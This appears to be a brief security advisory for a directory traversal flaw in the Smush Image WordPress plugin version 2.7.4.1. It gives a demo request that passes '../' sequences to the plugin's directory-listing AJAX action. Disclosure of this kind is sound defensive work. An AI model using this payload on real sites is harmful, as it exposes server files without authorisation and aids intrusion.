WordPress Smush Image 2.7.4.1 Directory Traversal

2017.10.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

Class File transversal Remote Yes Credit Ricardo Sanchez Smush Image Wordpress WP plugin is prone to file transversal vulnerability because it fails to sufficiently folders privacy. To exploit this issue following steps: Demo url: http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx Confirm: https://wordpress.org/support/topic/file-transversal-bug/#post-9554401


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top